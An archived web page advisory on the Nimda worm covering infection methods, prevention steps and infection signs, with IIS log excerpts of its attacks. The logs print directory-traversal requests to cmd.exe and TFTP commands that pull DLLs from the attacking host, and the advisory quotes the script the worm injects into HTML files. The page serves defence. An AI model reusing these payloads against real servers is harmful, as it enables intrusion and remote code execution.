WordType Designs
Driven To Distractions©
The Sound of One Hand Clapping©

A rchive Date
[ 04-11-2001 ]
Category
[ Information Technologies ]
sub-Categoy
[ Microsoft ]
      [Nimba Worm Information
      A new worm, called w32.nimda.amm, Nimba and README.EXE, is propagating the Internet through e-mail and network attacks. The email contains an attachment called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode.
      The worm launches a wide variety of network attacks against IIS boxes. Several attacks scan for machines compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). It also attempts to exploit numerous other known IIS vulnerabilities.

      Infection Methods
      1. Email as an attachment of MIME audio/x-wav type.
      2. By browsing an infected web server with JavaScript execution enabled and using a version of IE vulnerable to the exploits discussed in MS01-020 (e.g. IE 5.0 or IE 5.01 without SP2).
      3. Machine to machine in the form of IIS attacks (primarily attempting to exploit vulnerabilities created by the effects of Code Red II, but also vulnerabilities previously patched by MS00-078)
      4. Highlighting either a .eml or .nws in Explorer with Active Desktop enabled (W2K/ME/W98 by default) then the THUMBVW.DLL will execute the file and attempt to download the README.EXE referenced in it (depending on your IE version and zone settings).
      5. Mapped drives. Any infected machine which has mapped network drives will likely infect all of the files on the mapped drive and its subdirectories
      Prevention
      1. Ensure all IE versions are version 5.01SP2 or greater
      2. Disable Active Scripting in IE
      3. Ensure all IIS installations have applied MS01-044
      4. Install URLScan from Microsoft http://www.microsoft.com/technet/security/urlscan.asp and setup rules to block invalid requests
      5. Use the CALCS program to modify the permissions on TFTP.EXE and CMD.EXE to remove all use:
      CALCS %systemroot%/system32/tftp.exe /D Everyone
      CALCS %systemroot%/system32/tftp.exe /D System

      CALCS %systemroot%/system32/cmd.exe /D Everyone
      CALCS %systemroot%/system32/cmd.exe /D System

      (Note, this could be tried with THUMBVM.DLL as well)

      6. Ensure that TFTP is not permitted out through your network gateway (note that newly infected machines may try and TFTP *internally* from some other infected machine you have on your network)
      7. Modify or remove:

      HKEY_CLASSES_ROOT\.eml
      HKEY_CLASSES_ROOT\.nws

      Infection Signs
      Nimda is viral, so while you can remove various files that it drops it probably will not be cleaned completely by manual means. This means you will have to use your antivirus vendor's product to completely clean the systen.

      1. The following is appended to EVERY HTML file on the machine: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
      2. Just about every directory on the machine has one or more files with extension .eml, mostly readme.eml but also other names that seem to correspond to directory or other filenames. Total of 1234 .eml files created, totalling 98Mb (about 78Kb each). Also got 55 files with extension .nws, containing exact same content. Both .eml and .nws files can be opened by Outlook Express.
      3. Virus makes numerous outbound connections to port 80 to propagate itself to other servers.
      4. Virus sets IE5 to IE4 compatibility mode (apparently to circumvent security) and crashes Explorer.exe when IE is launched. IExplore.exe appears to be hacked, and there is now a hidden IExplore .exe (note the space before the extension) in same directory.
      5. Virus code in stealth executable file with name tftp###, where ### is any numeric string. File has no extension, but it is definitely a Windows executable. This file is placed into \Program Files\Common Files\System\MSADC, and in same directory, Admin.dll appears to be hacked.
      6. IIS console hacked: New MMC.EXE placed in \WINNT directory, which may override original version in \WINNT\System32.
      7. Load.exe dropped as hidden/system file (probably in %systemroot%)
      8. Readme.exe dropped in every directory
      9. Admin.dll dropped in /scripts and/or root directories (not the _vti_bin directories of FrontPage)
      10. EXE files placed into TEMP directory. Note that most/all hacked EXE files are flagged Hidden.
      11. Riched20.dll files placed in random directories (not on PATH, not containing executables).
      12. NT Account "Guest" was made a member of the NT "Administrators" group!

      Portions of this information were provided by Russ Cooper from NTBugTraq

      Examples:

      #Software: Microsoft Internet Information Services 5.0
      #Version: 1.0
      #Date: 2001-10-31 05:03:03
      #Fields: date time c-ip cs-username s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent)

      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/root.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /MSADC/root.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:57 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.241.136%20GET%20Admin.dll%20c:\Admin.dll 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.241.136%20GET%20Admin.dll%20d:\Admin.dll 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.241.136%20GET%20Admin.dll%20e:\Admin.dll 502 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /msadc/..%5c../..%5c../..%5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:58 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:22:59 24.100.241.136 - HostName 192.168.XXX.XXX 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 www -

      2001-10-31 05:29:52 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/root.exe /c+dir 404 www -
      2001-10-31 05:29:52 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /MSADC/root.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:53 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 502 www -
      2001-10-31 05:29:55 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20cool.dll%20c:\httpodbc.dll 502 www -
      2001-10-31 05:29:55 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20cool.dll%20d:\httpodbc.dll 502 www -
      2001-10-31 05:29:55 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20cool.dll%20e:\httpodbc.dll 502 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /msadc/..%5c../..%5c../..%5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:56 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:57 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:57 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:29:59 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:02 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 05:30:03 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 www -

      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/root.exe /c+dir 404 www -
      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /MSADC/root.exe /c+dir 404 www -
      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:05:26 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:05:27 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:05:29 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 502 www -
      2001-10-31 07:05:41 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20Admin.dll%20c:\Admin.dll 502 www -
      2001-10-31 07:05:46 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20Admin.dll%20d:\Admin.dll 502 www -
      2001-10-31 07:05:49 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2024.100.104.71%20GET%20Admin.dll%20e:\Admin.dll 502 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /msadc/..%5c../..%5c../..%5c/..Á_../..Á_../..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..Á_../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:00 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 www -
      2001-10-31 07:06:01 24.100.104.71 - HostName 192.168.XXX.XXX 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 www -]


Some pages may require Adobe Acrobat Reader


Copyright and Fair Use Information: The contents of this web site is protected by international copyright laws and may not be reproduced in any form or manner whatsoever, if for the purpose of resale or solicitation of a donation. The essays included here, may be reproduced only if: 1)They are not altered in any way; 2) reproductions must be accompanied by this copyright page ; and 3) it is given freely and without charge.
Fair use: The fair use of copyrighted work, including such use by reproduction in copies or phonorecords or by any other means specified in above sections, for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research, is not an infringement of copyright. In determining whether the use made of a work in any particular case is fair use the factors to be considered include : (1) the purpose and character of the use, including whether the use is of a commercial nature or is for nonprofit educational purposes; (2) the nature of the copyrighted work; (3) the amount and substantiality of the portion used in relation to the copyrighted work as a whole, and; (4) the effect of the use upon the potential market value of the copyrighted work.
Home | About Narrative? |Contact
Copyright © 2025. All Rights Reserved
HAG122125 (1998 -2026)